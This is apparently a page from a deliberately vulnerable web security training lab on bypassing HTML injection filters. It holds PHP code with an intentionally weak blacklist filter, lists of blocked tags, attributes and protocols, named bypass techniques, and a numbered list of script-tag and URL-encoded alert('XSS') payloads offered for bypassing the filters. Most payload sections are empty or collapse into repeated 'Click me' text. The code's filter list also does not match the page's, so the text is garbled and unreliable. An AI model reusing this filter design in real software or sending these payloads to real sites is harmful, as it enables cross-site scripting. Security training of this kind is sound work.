Lab 2: HTML Injection with Filter Bypass

HTML injection with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates HTML injection vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters dangerous HTML tags and attributes but doesn't prevent all attack vectors.

Objective: Bypass security filters to achieve HTML injection and potentially XSS.

Vulnerable Code with Filters 
// Vulnerable: Basic filters that can be bypassed
function process_html_input_with_filters($input) {
    $dangerous_tags = ['script', 'iframe', 'object', 'embed', 'form'];
    $dangerous_attributes = ['onload', 'onerror', 'onclick', 'onmouseover'];
    $dangerous_protocols = ['javascript:', 'data:', 'vbscript:'];
    
    // Basic filter check (can be bypassed)
    $is_dangerous = false;
    
    foreach ($dangerous_tags as $tag) {
        if (stripos($input, '<' . $tag) !== false) {
            $is_dangerous = true;
            break;
        }
    }
    
    // Still vulnerable to bypass techniques
    if (!$is_dangerous) {
        return $input;
    }
}
Filtered HTML Injection
Active Filters

The following are filtered:

  • Tags: script, iframe, object, embed, form, input, button, link, meta, style
  • Attributes: onload, onerror, onclick, onmouseover, onfocus, onchange, onsubmit, onkeypress, onkeydown, onkeyup
  • Protocols: javascript:, data:, vbscript:, file:, ftp:, gopher:
Safe HTML Tags

These tags should work:

  • <h1>Hello</h1> - Heading
  • <p>Paragraph</p> - Paragraph
  • <div>Container</div> - Container
  • <span>Inline</span> - Inline
Vulnerability Details
  • Type: HTML Injection with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters
Bypass Techniques
  • Case Variation: Use different cases
  • Encoding: Use encoded characters
  • Alternative Tags: Use unfiltered tags
  • String Manipulation: Build HTML dynamically
HTML Injection Filter Bypass Payloads

Use these payloads to bypass the security filters:

1. Case Variation Bypass:
2. Encoding Bypass:
<script>alert('XSS')</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script>
3. Alternative Tags Bypass:
4. Attribute Bypass:
5. Protocol Bypass:
Click me Click me Click me Click me Click me
6. String Concatenation Bypass:
7. Alternative Attributes Bypass:
8. Event Handler Bypass:
9. CSS Injection Bypass:
10. Advanced Bypass Techniques:
11. Unicode and Encoding Bypass:
<script>alert('XSS')</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <script>alert('XSS')</script>
12. Alternative Event Handlers:
13. Data URI Bypass: